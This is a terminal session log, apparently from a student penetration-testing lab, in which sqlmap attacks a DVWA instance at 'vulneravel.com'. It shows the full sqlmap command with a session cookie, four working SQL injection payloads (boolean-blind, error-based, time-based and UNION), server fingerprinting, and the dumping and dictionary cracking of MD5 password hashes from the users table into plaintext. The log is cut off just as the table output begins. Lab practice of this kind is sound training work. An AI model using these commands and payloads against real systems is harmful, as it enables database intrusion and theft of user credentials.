Script started on 2025-03-30 13:30:30-03:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="237" LINES="62"]
[?2004h]0;aluno@atacante: ~[;32m┌──([1;34maluno㉿atacante[;32m)-[[0;1m~[;32m]
[;32m└─[1;34m$[0m [7msqlmap -u 'http://vulneravel.com/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie 'security=low;PHPSESSID=t35ehprb75csdljgn35d9fa40u' -D dvwa -T users -C user,password,last_login --dump[27m[C[C[C[Csqlmap -u 'http://vulneravel.com/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie 'security=low;PHPSESSID=t35ehprb75csdljgn35d9fa40u' -D dvwa -T users -C user,password,last_login --dump
[?2004l[01;33m        ___
       __H__
 ___ ___[[01;41m.[01;49m]_____ ___ ___  [01;37m{[01;33m1.8.6.3#dev[01;37m}[01;33m
|_ -| . [[01;41m)[01;49m]     | .'| . |
|___|_  [[01;41m.[01;49m]_|_|_|__,|  _|
      |_|V...       |_|   [0m[4;37mhttps://sqlmap.org[0m

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:30:38 /2025-03-30/

[[36m13:30:38[0m] [[32mINFO[0m] resuming back-end DBMS '[37mmysql[0m' 
[[36m13:30:38[0m][1m [[32;1mINFO[0m][1m testing connection to the target URL[0m
[1mgot a 302 redirect to 'http://vulneravel.com/login.php'. Do you want to follow? [Y/n] [0my
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=-1' OR NOT 1670=1670#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=-1' OR (SELECT 1366 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(1366=1366,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fItP&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=-1' AND (SELECT 8764 FROM (SELECT(SLEEP(5)))eCLW)-- qXex&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=-1' UNION ALL SELECT CONCAT(0x716a786b71,0x6a7a72786661526a637049646f74416e70477a7376614c5a756a764b637176487545546277784743,0x716a7a7171),NULL#&Submit=Submit
---
[[36m13:30:45[0m][1m [[32;1mINFO[0m][1m the back-end DBMS is MySQL[0m
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0 ([37mMariaDB [0mfork)
[[36m13:30:45[0m] [[32mINFO[0m] fetching entries of column(s) '[37m`user`,last_login,password[0m' for table '[37musers[0m' in database '[37mdvwa[0m'
[[36m13:30:45[0m] [[32mINFO[0m] recognized possible password hashes in column '[37mpassword[0m'
[1mdo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] [0my
[[36m13:30:52[0m] [[32mINFO[0m] writing hashes to a temporary file '[37m/tmp/sqlmapvmpsvsc71471/sqlmaphashes-np6zi74z.txt[0m' 
[1mdo you want to crack them via a dictionary-based attack? [Y/n/q] [0my
[[36m13:30:56[0m] [[32mINFO[0m] using hash method '[37mmd5_generic_passwd[0m'
[[36m13:30:56[0m] [[32mINFO[0m] resuming password '[37m123[0m' for hash '[37m202cb962ac59075b964b07152d234b70[0m'
[[36m13:30:56[0m] [[32mINFO[0m] resuming password '[37mabc123[0m' for hash '[37me99a18c428cb38d5f260853678922e03[0m'
[[36m13:30:56[0m] [[32mINFO[0m] resuming password '[37mcharley[0m' for hash '[37m8d3533d75ae2c3966d7e0d4fcc69216b[0m'
[[36m13:30:56[0m] [[32mINFO[0m] resuming password '[37mletmein[0m' for hash '[37m0d107d09f5bbe40cade3de5c71e9e9b7[0m'
[[36m13:30:56[0m] [[32mINFO[0m] resuming password '[37mpassword[0m' for hash '[37m5f4dcc3b5aa765d61d8327deb882cf99[0m'
Database: dvwa
Table: users
[